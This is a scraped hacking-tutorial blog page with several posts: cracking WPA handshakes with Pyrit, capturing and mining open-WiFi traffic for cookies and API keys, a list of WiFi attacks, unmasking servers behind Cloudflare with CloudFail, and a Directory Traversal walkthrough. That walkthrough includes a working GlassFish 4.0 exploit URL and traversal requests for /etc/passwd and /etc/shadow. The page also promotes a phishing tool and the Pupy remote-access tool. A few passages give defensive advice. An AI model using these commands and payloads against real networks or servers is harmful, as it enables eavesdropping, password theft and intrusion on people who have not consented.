Follow by Email

Blog Archive

Search This Blog

Youtube Videos

Featured post

SocialFish V3 - The Ultimate Phishing Tool

SocialFish V3 - The Ultimate Phishing Tool Educational Phishing Tool & Information Collector Setting Up SocialFish Prerequis...

Recent PostAll the recent news you need to know

Advanced use of pyrit

The basic use of Pyrit, as well as the most efficient algorithm for implementing an attack, is described in the section “ Breaking a Handshake in Pyrit - the fastest way using graphics processors and preliminary calculation of hashes ”. It is recommended to start reading from it.

The above algorithm for using Pyrit is the most popular. However, Pyrit has many more commands and options.


    Pyrit database structure. Import and export passwords

    Let's take a closer look at the components of the Pyrit database. First, it is passwords. The same passwords can be used when hacking different Access Points. Two commands are used to import passwords:
    • import_passwords
    • import_unique_passwords
    It is the same for these commands that passwords can contain all characters (including NULL-bytes) except the terminating newline characters ("\ n"). Passwords that are not suitable for use with WPA- / WPA2-PSK are ignored. Those. cleaning the password file that we performed was not necessary.

    The difference between these teams is that:
    • The import_passwords command controls the uniqueness of the passwords to be imported, and the import_unique_passwords command does not, it imports all passwords, even those that already exist in the database.
    • The import_unique_passwords command is much faster.
    The names of the commands make you think that there is an error in the documentation. Because import_unique_passwords is more suitable for importing unique passwords. But there is no error.

    Import speed with import_unique_passwords exceeds import speed with import_passwords at times. Therefore, if you have a giant dictionary, the size of which is measured in gigabytes, then you can save a lot of time only on importing passwords. Of course, if you are confident in its "purity" (no duplicate data).

    By the way, passwords can be saved from a database to a file, this is done by the export_passwords command . Example of use:
    pyrit -o myword.txt.gz export_passwords
    As already mentioned, passwords can be used many times. And Pyrit itself monitors the purity of the password database. But importing passwords takes as much time as calculating hashes. Each TD hash has its own TD, since the TD name is the salt in these hashes.

    We created our access point table with the create_essid command . Some commands independently create the necessary table in case it is necessary, but has not yet been created. You can also create many ESSIDs. To do this, after the -i option, you need to specify a file in which there is a list of ESSIDs (each AP on a new line). Re-creating an existing ESSID will not result in an error.

    Pyrit attack implementations

    To calculate the hashes, we used the batch command , and for the subsequent attack (checking on hashes) we used the attack_db command . The following options are possible:

    • attack_batch - if passwords are translated into hashes, then these hashes are used, if there are passwords that are not “counted” in hashes, they are calculated and a check is performed on all these hashes (attack). In fact, attack_batch = batch + attack_db at a time. Supports options -b ,  -e and -o .
    • attack_cowpatty - not only Pyrit can generate Pairwise Master Keys from passwords, for example, genpmk can also do this . If we use a database of hashes that are generated in the cowpatty format , then we use this command.
    • attack_db - conducts an attack on previously calculated (using batch ) hashes. Supports options -b-e and -o .
    • attack_passthrough - this command bypasses the Pyrit database and should be used only if there are problems with storage space (for example, on the LiveCD). Use attack_batch instead . Supports options -b-e and -o .
    • batch - Runs the translation of all passwords in the database to their respective Pairwise Master Keys (paired master keys) and saves the results to the database. You can use the -e option  to limit the use of this command to only one ESSID; if this option is omitted, all ESSIDs will be processed one by one in an undefined order.
    • passthrough - Reads passwords from the file given with  -i  and calculates them as the pairwise master keys for the ESSID given with  -e . The results are written to the file that is specified after  -o  in the cowpatty binary format and are not saved in the database for future use. Those. This command bypasses the need to have a database and should only be used if there are problems with storage space (for example, when using Pyrit on a LiveCD). The batch command provides exactly the same functionality as  passthrough , but can provide much improved performance, since the results can be read from the database instead of recalculating them. If you still do not understand, then passthrough is like batch , only received hashes are not saved to the database, but output to standard output.
     Example of practical use: pre>pyrit -i dirty_words.txt.gz -e NETGEAR -o - passthrough | cowpatty -d --r wpatestcapture.cap -s NETGEAR

    Distributed and remote use of resources with Pyrit

    Pyrit can act as a server and as a client. With a certain skill, you can organize a distributed calculation of hashes.
    relay
    Starts the server to relay another storage device via XML-RPC; another Pyrit client can use this server as storage. This allows it to have network access to its own (like file: // and sqlite: //) or SQL databases hidden behind a firewall and provides multiple client access to the database via Pyrit RPC interface. TCP port 17934 must be open for this feature to work. For example, on the server (where is the database):
    pyrit -u sqlite://var/local/pyrit.db relay
    and client (where is the big GPU):
    pyrit -u http://192.168.0.100:17934 batch
    -u URL
    To connect using the option  -u the URL . It allows you to specify the URL of the device storage in the form:
    driver: // username: password @ host: port / database
    Pyrit can use the file system, the remote Pyrit-Relay-Server and, if the python-sqlalchemy package is installed, a SQL database as storage. The file: // driver sends to its own Pyrit file system, which is located on the disk, http: // links to the Pyrit-Relay-Server and all other URLs go directly to python-sqlalchemy, if available. Device URLs by default can also be specified by the defaultstorage key in the pyrit configuration file (for details, see the help and see the FILES section  ).
    serve
    Launches a server that provides access to local computing equipment to assist Pyrit clients. The server's IP address must be added to the clients configuration file , as a space-separated list in known_clients . The rpc_server-setting setting for clients should also be 'true' . TCP and UDP ports 17935 must be available. For example, on the server (where there is a GPU):
    pyrit serve
    and on clients (the server’s IP address was added to known_clients and rpc_server is set to 'true' ):
    pyrit -r test.pcap -b 00:de:ad:be:ef:00 -i words.txt attack_passthrough

    Handshake Search with Pyrit

    To identify handshakes, there are three commands:
    analyze  - parses one or more files with captured packets (in pcap format, it is possible to work with compressed gzip files) transferred with the -r option   and try to determine the Access Point, Station and EAPOL handsets. Example:
    Handshake Search with Pyrit

    root@Kalitut:~/# pyrit -r DANIELLE2015-01.cap analyze
    Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
     
    Parsing file 'DANIELLE2015-01.cap' (1/1)...
    Parsed 35 packets (35 802.11-packets), got 3 AP(s)
     
    #1: AccessPoint 68:72:51:40:78:b5 ('@Office N.Y TMN WiFi 038-249734'):
    #2: AccessPoint 0c:54:a5:c0:24:d6 ('DANIELLE2015'):
      #1: Station e0:99:71:fa:d3:c9
      #2: Station 4c:8d:79:9c:06:54
      #3: Station 00:1f:3a:41:5e:70, 9 handshake(s):
        #1: HMAC_SHA1_AES, good, spread 1
        #2: HMAC_SHA1_AES, good, spread 1
        #3: HMAC_SHA1_AES, good, spread 1
        #4: HMAC_SHA1_AES, good, spread 3
        #5: HMAC_SHA1_AES, good, spread 3
        #6: HMAC_SHA1_AES, good, spread 3
        #7: HMAC_SHA1_AES, good, spread 3
        #8: HMAC_SHA1_AES, good, spread 7
        #9: HMAC_SHA1_AES, good, spread 7
      #4: Station 74:e2:f5:ba:bc:bc
    #3: AccessPoint 20:25:64:16:58:8c ('Mial'):
    strip - Parsing one or more captured packet files sent with the -r option  , extracts only the packets that are needed to detect the EAPOL handshake and writes a new dump to the file passed with the -o option  . You can use the -e and -b options to filter specific Access Points. Example:
    pyrit -r "large_dumps_*.pcap" -e MyNetwork -o tiny_compressed_dump_MyNetwork.dump.gz strip
    stripLive - Parsing a file with captured packets that are passed with the -r option , extracts only the packets that are needed to detect an EAPOL handshake and writes a new dump to the file passed by the -o option . This command differs from strip in that the captured file can be a character device, including sockets and other pseudo-files that look like pcap files. stripLive writes the relevant packets to a new file ( provided by the -o option ) as they stay instead of trying to read the entire capture file first.

    Pyrit Hacking captured handshakes the fastest way using GPUs and pre-calculating hashes.

    Benefits of using Pyrit
    Hacking captured handshakes is the only way to break WPA / WPA2 passwords. It is produced by the brute force method (brute force).
    handshaking

    By the way, if you are not familiar with the handshake capture technique, then refer to the article “ Handshake Capture in Kali Linux ”.

    Intercept and analysis open WiFi traffic

    Is it dangerous to use open WiFi
    Internet access via WiFi is currently very popular. WiFi is in many apartments, in the workplace. When using wireless access, it is important to maintain the security of your Access Point
    Intercept and analysis open WiFi traffic

    Nowadays, public WiFi networks are also very popular. They are in restaurants, gyms, shopping centers, subways, hotels, private hospitals and clinics, apartments and condominiums - they can be found almost everywhere where quite a lot of people are going.

    These networks have a feature - often they are open WiFi networks for connecting to which no password is required. Are there any additional security rules for working with such networks?

    Yes, when using an open WiFi network, you need to be well aware that:
    • all data is transmitted by radio waves, that is, unlike wires, which are far from being accessed by everyone, radio waves can be intercepted by anyone who is within range of in
    •  open networks, data is not encrypted
    With the first point, I think everything is clear, if someone with a computer and a WiFi card is close enough, then he can capture and save all the traffic transmitted between the wireless Access Point and all its clients.
      As for the second point, it is necessary to clarify the encryption of the transmitted data. For example, if you open a website that uses the HTTPS protocol (that is, a secure protocol), for example, https://fb.com/ then the data transmitted to this site and from this site to you is encrypted. If you open a website that uses the HTTP protocol, then all the transmitted data: which pages you visited, which comments you left, which cookies your web browser received - these data are transmitted in unencrypted form. So, if you are connected to a WiFi Access Point that requires entering a password, then the transmitted traffic is encrypted again. That is, even if you open a site on the HTTPS protocol, the transmitted traffic is encrypted twice (the first time when transmitting from a web browser to a web server and in the opposite direction, a second time when transmitting from your device to the Access Point, reverse direction). And if you open the site on the HTTP protocol, then the transmitted traffic is encrypted only once (only when transferring from your device to the Access Point and back).

      But open access points do not encrypt traffic. This means that if you use an open access point and open a website that runs on the HTTP protocol, then your data is transmitted in the clear and anyone near you can capture and save it. If you open a site on the HTTPS protocol, then this data is encrypted, however, you can still see exactly which sites you opened (although you don’t see which pages you entered, for example, which comments you left).

      So: you need to remember that open wireless networks are subject to interception of information.
      Next, I will show an example of data interception, from which it will become clearer what exactly an attacker can see.

      Intercept open WiFi networks traffic


      For a successful attack, you need a computer on Linux (for example, with Kali Linux or with BlackArch), and also a WiFi card from this list .

      Let's start by looking at the names of the wireless interfaces:
      iw dev
      iw dev
      As you can see, I have several wireless interfaces, I will use wlp0s20f0u2 .

      Putting the wireless interface in monitor mode:
      sudo ip link set INTERFACE down 
      sudo iw INTERFACE set monitor control 
      sudo ip link set INTERFACE up
      In previous commands, instead of INTERFACE, you need to enter the name that the wireless interface has on your system. For example, for the wlp0s20f0u2 commands look like this:
      sudo ip link set wlp0s20f0u2 down 
      sudo iw wlp0s20f0u2 set monitor control 
      sudo ip link set wlp0s20f0u2 up
      Run airodump-ng with a command like:
      sudo airodump-ng INTERFACE -t OPN
      Where:
      • INTERFACE - the name of the wireless interface in your system
      • -t OPN - a filter that shows only open WiFi networks
      My interface is called wlp0s20f0u2, so I run the following command:
      sudo airodump-ng wlp0s20f0u2 -t OPN
      An example of the data obtained:
      BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                   
      00:15:6D:9A:26:C0  -35       19      454    8   1   65  OPN              Anan Apartment      
      00:15:6D:9C:26:84  -45       29        1    0   6   65  OPN              Anan Apartment      
      00:27:22:02:C0:D0  -64       17        0    0   1   65  OPN              Anan Apartment     
      C8:3A:35:01:3F:90  -78        9        1    0  11  135  OPN              Tenda
      As you can see, there are several open Access Points at once. In principle, you can choose any of them to intercept data, but you need to remember that: for successful data analysis, it is important to capture the transmitted data from both the AP and the Clients. That is, I can choose to capture data from a remote AP and, probably, I will capture most of its wireless frames, but the fact is that Clients usually have less powerful wireless transmitters. Clients can also be located further away from me than the Access Point itself. For this reason, it is better to choose the closest AP. The higher the PWR value, the better the signal (just in case I remind you: negative numbers are closer to zero, the more they are). For example, in my situation, I choose a AP with a -35 signal.

      Directional antennas can significantly improve the quality of a wireless connection if directed in the right direction. As for data capture, it is better not to use a directional antenna, as AP can be in one direction, and its Clients - in others. It is advisable to use a large external antenna.

      It doesn't matter if the AP is a hotspot with authorization on the web interface (Captive Portal Check How to bypass Captive Portal) or simply open Access Point - the described interception method works the same for any of these options.

      To capture data, run airodump-ng again , but with a command like this:
      sudo airodump-ng INTERFACE --CHANNEL NUMBER --write openap
      Where:
      • INTERFACE - the name of the wireless interface,
      • Channel NUMBER - number of the channel where the target AP is located
      • Write openap - option to save captured data to file. In this case, the file name will begin with openap (can be changed to your liking)
      For example, I want to listen to the AP that runs on the first channel, for this I want to use the wlp0s20f0u2 wireless interface and save the captured information to a file that starts with openap, then my command is as follows:
      sudo airodump-ng wlp0s20f0u2 --channel 1 --write openap
      Analysis of traffic
      Next, wait for enough data to be collected. You can analyze data directly in the process of capturing - without stopping airodump-ng.

      Analysis open WiFi networks traffic


      During the work of airodump-ng, a file with the .cap extension will be created , for example, openap-01.cap.

      To analyze the data, you can use different programs, I will show the analysis of wireless traffic with Wireshark .

      Open the file with the captured data in Wireshark.

      To highlight different data, we will need Wireshark filters. Here I will show an example of using only some filters, it is recommended to study a large selection of useful Wireshark filters here .

      To assess the quality of capture, you can start with filters that display the results of the TCP protocol analysis.
      For example:
      tcp.analysis.duplicate_ack_num == 1
      Wireshark filters
      This filter displays information about frames with the ACK flag, which are duplicates. A large number of such frames may indicate communication problems between the Client and the Access Point.
      Filter showing frames for which the previous segment is not captured:
      tcp.analysis.ack_lost_segment
      tcp.analysis.ack_lost_segment
      This is normal at the beginning of data capture - because the information is not intercepted from the beginning. But if this error often occurs later, then you are too far from the Access Point or Clients and you do not capture some of the data that they transmit.

      To display frames that are retransmission (resend):
      tcp.analysis.retransmission
      A large number of such frames may indicate that there is a poor connection between the Client and the AP and they often have to resend the same data.
      Using filter:
      arp
      filter arp
      You can see the ARP traffic - with its help, it is convenient to analyze how many devices are currently connected to the local network, what IP addresses they have and what MAC addresses.
      Using filter
      dns
      You can see all sent DNS requests.
      DNS requests
      Thanks to these requests, you can find out which sites the users have visited (even if these sites use HTTPS!), As well as which online services were requested.

      For example, in the screenshot you can see the addresses of the online cinema Netflix, Facebook, various Google services.

      To filter HTTP traffic filter:
      http
      Here you can find a lot of interesting information. For example, you can see requests for services and data transmitted, including API keys, device identifiers, and so on:
      HTTP traffic filter
      You can see the visited URL with all the parameters passed:
      You can see the files downloaded and opened on the Internet:
      You can save any transferred file. To do this, select the package that contains it
      (1) with the mouse, then in the middle pane that contains detailed information, scroll to the bottom to find the data field and right-click on it to bring up the context menu
      (2), context menu, select Export Selected Packet Bytes
      (3) - Export bytes of the selected package:
      Enter a file name, select a location and save it.
      Using filter
      http.cookie
      You can see HTTP requests in which cookies were transmitted. And using the filter
      http.set_cookie
      You can see the requests in which the server has installed cookies in the user's browser. To search for any transferred images:
      http.content_type contains "image"
      To search for specific types of images:
      http.content_type contains "gif"
      http.content_type contains "jpeg"
      http.content_type contains "png"
      To search for files of a specific type:
      http.content_type contains "text"
      http.content_type contains "xml"
      http.content_type contains "html"
      http.content_type contains "json"
      http.content_type contains "javascript"
      http.content_type contains "x-www-form-urlencode"
      http.content_type contains "compressed"
      http.content_type contains "application"
      Search Wireshark requests for receiving files of a certain type. For example, to search for transferred ZIP archives:
      http.request.uri contains "zip"
      Instead of http.request.uri for greater accuracy, you can use http.request.uri.path or http.request.uri.query filters , for example, to search for requests to download JPG files (links to pictures):
      http.request.uri.path contains "jpg"
      A filter that shows only the data sent by the POST method:
      http.request.method == "POST"
      A filter that shows only the data transmitted by the GET method:
      http.request.method == "GET"
      Search for requests to a specific site (host):
      http.host == ""
      Search requests to a specific site by name:
      http.host contains "www.facebook.com"
      Conclusion
      Now the number of applications and sites that do not use encryption is rapidly decreasing. Therefore, the danger of such interception decreases every year. Nevertheless, it is.

      How to strengthen the signal WiFi

      WiFi signal enhancement
      There are situations when we have access to a WiFi network (there is a password), but the signal is weak and not all of our devices can work stably or even connect to a wireless network. This can be encountered both when using neighboring WiFi from the house opposite, and in quite legitimate situations - for example, in a hotel there is one access point to the whole floor (or even in the lobby). As a result, for example, a laptop can connect to a WiFi network with a weak signal, and a mobile phone simply does not see it.

      How to strengthen the signal WiFi
      Some routers have a repeater function (tutor) and they can be used to amplify a weak WiFi signal. But the router with the WiFi signal enhancement function is not always available (especially when traveling), so I’ll consider a slightly different option.

      Putting a wireless card into monitor mode on Kali Linux

      Putting a wireless card into monitor (monitor) mode on Kali Linux using the ip and iw commands
      almost Any attack on WiFi begins with the transfer of the card to monitor mode (tracking mode).
      To do this you can use the Airmon-ng tool , A Better way is using the ip and iw commands
      with  “manual” way of transferring to the monitoring mode the interface will keep it's own name so if it was wlan0 it will stay the same wlan0 thats because Airmon-ng  create a virtual interface when it start monitor mode on wifi adapters, so to begin let's look at the name of the wireless interface:

      Types of WiFi attacks

      For myself, I group the types of attacks on wireless access points as follows:

      • Hacking WPA / WPA2 passwords
      • WEP attack
      • Hacking WPS Pin
      • WPA downgrade
      • Replacing a true access point with a fake
      • Scam Access Point
      • Attack on WiFi access point from the global and local networks
      • Denial of Service Attacks (WiFi DoS)
      • Attacks on specific services and functions of routers

      Let us characterize each of them in somewhat more detail.
      Types of WiFi attacks

      Hacking WPA / WPA2 passwords
      This is the most universal attack on WiFi. Its advantage is that it applies to all access points that use WPA / WPA2 (most of them).

      There are also disadvantages that arise from the strength (reliability) of WPA / WPA2. They are that:

      • To implement an attack, the TD must have connected clients;
      • password decryption is carried out by brute-forcing (brute force).

      Those. With a strong password, hacking WiFi in a reasonable time will not work.

      WEP attack
      This group of attacks includes not only the decryption of a password in plain text. For WEP, a number of various attacks are opened and implemented that allow you to get the desired result even without decrypting the passphrase.

      Unfortunately, now WEP hacking goes into the background, as the number of APs that use it is constantly decreasing.

      Hacking WPS Pin
      The situation is similar to WEP. Good for cracking, just recently (less than a year ago) a new hole was revealed, which, instead of the usual hours for breaking into WPS, takes several seconds.

      And exactly the same trouble as WEP - the lack of universality. The number of APs in which WPS is enabled is less and less.

      WPA downgrade
      Just above, WPA / WPA2 provides sufficiently reliable protection if the user has not selected a simple password. Since from a technical point of view, new methods have not been proposed so far, several methods of social engineering have been implemented. This is one of them.

      A permanent deauthentication of Stations and TDs is made by sending WPA encrypted packets. The goal is to convince the user of the WPA protocol malfunction and force it to go to WEP or disable encryption. This attack is implemented in mdk3 . mdk3 will allow clients to work with WEP or without encryption, so there is a chance that the system administrator will simply think “WPA is broken” (which can happen to incompetent employees). This can / should be combined with social engineering.

      Replacing a true access point with a fake
      The bottom line is that the access point is suppressed by the endless sending of deauthenticated packets . At the same time, the attacker “raises” his TD with similar characteristics and waits for users to connect to it.
      Further, under various pretexts, WPA / WPA2 passwords are lured away.

      Most finished this attack can realize, for example, wifiphisher .

      As in the previous case - this is social engineering. The probability of a successful outcome is proportional to the incompetence of the opposite side.

      Scam Access Point
      This is not really an attack on WiFi. Rather, it is an attack using WiFi.

      The bottom line is that the attacker configures an open point of access to the Internet. Unsuspecting lovers of freebies are connected to it. And the attacker at this time implements all sorts of attacks to intercept passwords, sessions, cookies, or redirect to fraudulent sites.

      Attack on WiFi access point from the global and local networks
      This is a rather undervalued problem. And you just think, a huge number of people have a wireless router or modem at home. As a rule, few people go further than setting up the Internet and WiFi. Few people care about changing the administrator password, and very few people update their device firmware in time.

      And all this set of devices with admin: password credentials are beautifully visible to scanners on a local or global network ... (there are exceptions, for example, devices with gray addresses, behind NAT, etc. are not visible. Ie they are not visible from the global network, but no one has canceled their visibility in local networks).

      And there are already implementations of a mass attack on default credentials and known router vulnerabilities: Router Scan by Stas'M .

      The situation is similar to the anecdote: "The Gestapo overlaid all exits, but Stirlitz went out through the entrance ."

      And every year the number and types of devices that are connected to the network, only increases. A natural consequence of this is the increase in the number of devices that are not configured by anyone at all. Web cameras, file servers, TVs with WiFi (and with built-in video cameras, by the way), as well as various other elements of the smart home, are added to these devices.

      Denial of Service Attacks (WiFi DoS)
      The attack is quite simple and very effective. Its meaning is the endless sending of deauthentication packets .

      You can protect yourself from such an attack only by connecting to the router via a wire. As with all other DoS attacks, data leakage does not occur. Only broken normal work. Similar to other DoS attacks, after its termination, everything starts working on its own in normal mode.

      Attacks on specific services and functions of routers
      Modern advanced routers have USB ports to which you can connect flash drives, hard drives, 3G modems and other peripherals. Routers, besides their usual functions, can be file servers, web servers, torrent clients, etc.

      There are two dangers here: the vulnerability of a secondary service, or incorrect configuration (for example, factory passwords), which will allow an attacker to seize control.

      how to find ip behind cloudflare

      Cloudflare is a gasket between the user and the site. It works on the principle of reverse proxy, providing additional services, including page caching, protection against DDoS, protection against bad bots, and more. Including, Cloudflare hides the true IP address of the server that hosts the site.
      Cloudfail Video tutorial:
      Cloudflare uses its name servers that respond to DNS queries and translate the host name into an IP address. Those. the site owner configures the use of Cloudflare NS servers for his domain, these NS servers in response to DNS requests are sent by IP belonging to the Cloudflare network. As a result, the request to the site goes to Cloudflare, which receives the page from the server where the site is located (or from its cache) and shows this page to the user who requested it. As a result, the true IP address of the site behind Cloudflare becomes well hidden.

      If Cloudflare is configured correctly, then the real IP address of the site is never disclosed or recorded anywhere; but how many people do you know who always do everything right? For this reason, there are tools that look for holes in your Cloudflare settings. One of these tools is CloudFail , and this note is devoted to it.

      What is and how CloudFail works
      Each site can have subdomains like * .say.com . Where, instead of an asterisk, different values ​​can be substituted, for example:
      • www.site.com
      • en.site.com
      • forum.site.com
      • test.site.com
      • admin.sayt.com
      • 111.site.com
      • chat.site.com
      There can be an unlimited number of such subdomains. Important point: each such subdomain can have its own IP address!

      Those. name servers allow you to specify IP (or several addresses at once) for website.com , another IP for test.say.com , another IP for en.say.ru and so on.

      There may be a situation when the Cloudflare IP address is registered in the DNS records of the site.ru site, but the DNS records for the subdomain test.site.com point to another IP that is not under Cloudflare protection.

      As a result, an IP address is disclosed that:
      • may be the real IP address of the site;
      • is the IP address of the subdomain only, but gives us information about the owner or a hint for further research.
      We can't just get a list of all subdomains. Therefore, you need to sort out various options. This is exactly what is implemented in CloudFail:
      • various subdomain options are tried;
      • if there is a DNS record for the subdomain, then we get an IP for it;
      • it checks if the received IP is in the Cloudflare range (i.e., protected with Cloudflare or not).
      In fact, the described process is already the third stage. In the first stage, CloudFail receives a list of possible subdomains from DNSDumpster.com and checks them.

      At the second stage, CloudFail refers to the CrimeFlare service , which has gathered a large IP address base for sites protected by Cloudflare. If the site knows the IP, then it is immediately shown. About CrimeFlare described in more detail here .

      And in the third stage, the described brute-force subdomains are performed in the dictionary.

      As a result of this integrated approach, it is often possible to find IP addresses that are not protected by Cloudflare.
      It is important to note that we proceed from the assumption that the IP addresses of the subdomains belong to or are associated with the owner of the main site. Yes, this is usually the case, but you should always remember that in the DNS records of the subdomains the owner of the main domain can specify ANY IP addresses that do not even belong to him ...
      How to install CloudFail
      To install CloudFail on Ubuntu, Kali Linux, Debian, Linux Mint and their derivatives, run the following commands:
      First we need to install pip3 for python3 dependencies:
      sudo apt-get install python3-pip
      Then follow those commands
      sudo apt update 
      sudo apt install python3-pip git tor 
      git clone https://github.com/m0rtem/CloudFail 
      cd CloudFail / 
      Then we can run through dependency checks:
      pip3 install -r requirements.txt
      Before the first launch, as well as from time to time (about once a month), it is recommended to update the databases:
      sudo python3 cloudfail.py -u
      The list of Cloudflare IP addresses will be updated, as well as the CrimeFlare database containing known IP addresses for some sites.
      If you want the program to work through the Tor network, then you need to start the Tor service:
      systemctl start tor
      If you do not need Tor to send requests, you can skip this step.
      If you wish, you can add the Tor service to autoload (then you will not need to start this service after each computer restart):
      sudo systemctl enable tor
      How to use CloudFail
      The program has only one mandatory option -t , after which you need to specify the domain name.
      Additionally, you can use the —tor option to make requests via this network.

      The program already supplies a list of words ( subdomains.txt file ) for searching possible subdomains in the dictionary. If you want to use your own dictionary, then specify it using the option -s . The dictionary file should be located in the data folder .

      For example, if we want to receive data for the tinyjpg.com site, then the launch command looks like this:
      sudo python3 cloudfail.py -t tinyjpg.com —tor
      CloudFail Results Analysis
      CloudFail Results Analysis
      The string is part of the Cloudflare network! says that the site is protected by the Cloudflare network. If this were not the case, then the scan stopped at this place, since it is meaningless.

      The Testing for misconfigured DNS string using dnsdumpster ... speaks of the beginning of the first stage — the retrieval of well-known hosts (subdomains) associated with the analyzed site. This data is taken from dnsdumpster, which, in turn, collects them from various sources (own site surveyors from the first million Alexa Top rankings, search engines, popular surveyors, Certificate Transparency, Max Mind, Team Cymru, Shodan and scans.io) . But brute-force domains are not used.

      As you can see, in our results among the DNS records found MX records that point to mail servers. Please note that in this case, MX records do not point to the subdomains of the site of interest to us, but to Google hosts. This is also indicated by the data on IP (belonging to a Google Internet service provider). These hosts are not protected by Cloudflare, but they are not suitable for research from open sources in order to discover this IP server. We can only conclude that the site uses e-mail based on Google’s postal services.

      The string Scanning crimeflare database ... speaks about the beginning of the second stage - searching the database of sites with known IPs from CrimeFlare.

      Inscription Did not find anything . says that nothing is found in this database.

      The line Scanning 2897 subdomains (subdomains.txt), please wait ... speaks about the beginning of the third stage - enumeration of possible subdomains according to the dictionary.

      The red line contains information about the found subdomains, but their IP is protected by the Cloudflare network - therefore, they are useless for determining the real IP (but can be used for other purposes).

      Green lines indicate that the IP of the found host does not belong to Cloudflare. Therefore, this can be the real IP of the site of interest.

      An example of a line from our case is mail.anti-malware.ru , unfortunately, the IP found again belongs to Google.
      But the line test.anti-malware.ru leads us to success - this is the IP VPS server.
      Search sites on one IP confirms that this is the real IP of the domain of interest to us.
      The next scan example is searchengines.guru.

      Results obtained:
      They say that the first and third stages did not produce results. But in the database CrimeFlare found the real IP of this site, it is 159.253.17.89.
      Scanning searchengines.ru:

      At the first stage, only Google's mail servers were found. Site not found in the CrimeFlare database.
      In the third stage, the following good data:
      [09:19:32] [FOUND: SUBDOMAIN] cdn.searchengines.ru IP: 54.192.98.230 HTTP: 403  
      [09:20:51] [FOUND: SUBDOMAIN] link.searchengines.ru IP: 90.156.201.86 HTTP: 200 
      [09:21:06] [FOUND: SUBDOMAIN] mail.searchengines.ru IP: 64.233.164.121 HTTP: 200
      mail.searchengines points to the IP of the Google mail server.

      cdn.searchengines.ru has IP CloudFront - one of the Cloudflare services, i.e. It also does not suit us.

      But link.searchengines.ru has an IP address (90.156.201.86) of a third-party server. You can open the link.searchengines.ru page - there is some forgotten, apparently, for many years not used online service. This IP may be an address, including, searchengines.ru. In any case, this IP is associated with the owners of searchengines.ru, even if the host itself is on a different server.
      How to set up Cloudflare correctly so that the real IP of the site cannot be found
      As you can see from the above examples, incorrect DNS configuration leads to the disclosure of this IP site, even if it is protected using Cloudflare. It is necessary to protect all hosts related to the site network Cloudflare. The same applies to wildcard characters in DNS records - such records should not reveal the true IP address of the site.

      It is necessary to remember about the possibility of disclosing the owner through the hosts of the mail servers used by the site.

      The site itself should not contain vulnerabilities that allow an attacker to conduct attacks in other areas.

      practice of attacking Directory Traversal

      Today I want to show you in practice how the Directory Traversal or Path Traversal attack can be used. This is a very simple and popular attack. But with its help you can access important information on the server. How to do this, and what the main features of this attack I will discuss in this article. We plan to release a whole selection of articles on the WEB, so I recommend that you be in the subject line so as not to miss the following materials.
      Directory traversal attack
      What is Directory Traversal and how much slashes need to be delivered?
      In addition to standard documents, different files, scripts, configuration templates and other documents are uploaded to the web server. When properly configured, the user cannot access these files. He simply does not have rights to other directories. Usually, when you go to this page, you see a 403 error code.
      Directory Traversal
      We are particularly interested in cases when configuration errors occur and these directories (by accident or stupidity) are open and we get access with all rights (root). This allows us to view files, change them, and also perform other manipulations. This is what we are going to do today, kneading on concrete examples.

      How to find such a vulnerability?
      It is very useful to analyze information about the found and already described vulnerabilities. For example, find a vulnerable plugin or CMS on the Exploit Database, check similar systems in Shodan and get the cream in the form of actual results. This method is more suitable for cases where you need to massively gain access to servers, and not to check a specific case.

      Auto scanners, such as Acunetix and Netsparker, are ideal for specific tasks. Almost the most popular case when the parameter is passed in the URL:
      http://some_site.com.br/get-files.jsp?file=report.pdf 
      And then it happens like this:
      http://some_site.com.br/../../../../etc/shadow  
      http://some_site.com.br/get-files?file=/etc/passwd 
      But in general, it looks like this:
      http://some_site.com.br/../../../../some dir/some file 
      There are also automatic tools, such as dotdotpwn . You can download from github. The tool has not been updated for a long time, but it copes with its functions with a bang.
      dotdotpwn
      The software is as simple as possible, but quickly selects possible options according to the list of payloads.
      dotdotpwn Directory Traversal
      If something is found, then we see the following message:
      attacking Directory
      Let's go to practice.
      Oracle Glassfish 4.0
      In order not to delve into the boring theory, I will show you in practice. I came across a server with this version. Well, is not it happiness?

      We check it for the presence of vulnerabilities on exploit-db and get just such a page with the inscription: “GlassFish Server - Arbitrary File Read”.
      We need to pull out from this page a line that allows you to read the file / etc / passwd. And this is simply because there are users of the system, their nicknames, identifiers, as well as home directories. Password information is usually stored somewhere else. And so we add a line to the address ( instead of http://site.com:4848 we substitute our domain with a port ):
      http://site.com:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
      We read in the response the contents of the file:
      We can also try to pull out information about the system or cause additional errors using this command:
      http://site.com:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/issues
      But the most interesting thing happens when you find out that some information is loaded from a file, and you know where this file is. Then in general it will not be difficult to take and read it. Instead of our standard line, it’s enough to add the necessary file and get its contents. For example, I knew for sure that the logs.txt file was in the root. Also, there may be other files - logs, scripts, and even data with access to other servers.
      http://site.com:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs.txt
      XSS and SQL
      Conclusion
      This is what this vulnerability looks like. It occurs on different resources. With it, you can download files, read configs, as well as access to interesting directories. According to my indicators of the found vulnerabilities, it takes a confident third place, after the incredible XSS and SQL, which we will analyze in the following articles. Remember that automatic tools and approaches are always good, but it happens, sometimes you need to sweat and find something with pens. After all, scanners do not see everything. The result can bring good money. After all, he had not yet been dragged to the holes, having checked a thousand times. That's all up to the next articles.

      Pupy remote administration tool

      Pupy  remote administration
      Pupy is an open source tool for cross-platform remote administration (Windows, Linux, OSX, Android are supported as “clients”) and subsequent exploitation (post-exploitation). Written mostly in Python.




